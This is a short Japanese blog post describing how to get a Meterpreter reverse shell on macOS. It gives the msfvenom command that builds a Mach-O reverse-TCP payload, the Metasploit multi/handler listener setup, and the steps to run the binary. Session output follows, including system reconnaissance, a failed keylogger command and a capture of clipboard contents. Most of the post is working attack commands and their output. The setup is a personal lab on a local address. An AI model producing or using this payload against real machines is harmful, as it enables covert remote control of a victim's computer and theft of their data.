2024年3月20日水曜日

Mac で meterpreter を使ったリバースシェルを行う

Mac で meterpreter を使ったリバースシェルを行う

概要

meterpreter ターミナルが使えほうがいろいろ便利なのでやってみました

環境

  • macOS 11.7.10
  • Metasploit 6.3.60

mach-o ファイルの作成

  • bundle exec msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=192.168.1.2 -f macho -o /path/to/test.macho

Mac 側待ち受け

msf6 exploit(multi/handler) > use exploit/multi/handler
[*] Using configured payload osx/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set payload osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.2:4444

mach-o ファイル起動

  • chmod +x test.macho
  • ./test.macho

動作確認

[*] Meterpreter session 7 opened (192.168.1.2:4444 -> 192.168.1.2:62110) at 2024-03-14 12:46:47 +0900

meterpreter > getuid
Server username: user01
meterpreter > sysinfo
Computer     : test.local
OS           : macOS Big Sur (macOS 11.7.10)
Architecture : x86
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx
meterpreter > keyscan_start
[-] The "keyscan_start" command is not supported by this Meterpreter type (x64/osx)

keyscan_start は使えないようです
クリップボードの取得はできそうです

meterpreter > load extapi
Loading extension extapi...Success.

meterpreter > clipboard_get_data
Text captured at 
=================
test.sh
=================

最後に

Mac でリバースシェルの際に meterpreter モードで接続する方法を紹介しました
おそらく shell 方式ではできないので meterpreter を使いたい場合は mach-o ファイルとペイロードを使いましょう

参考サイト

0 件のコメント:

コメントを投稿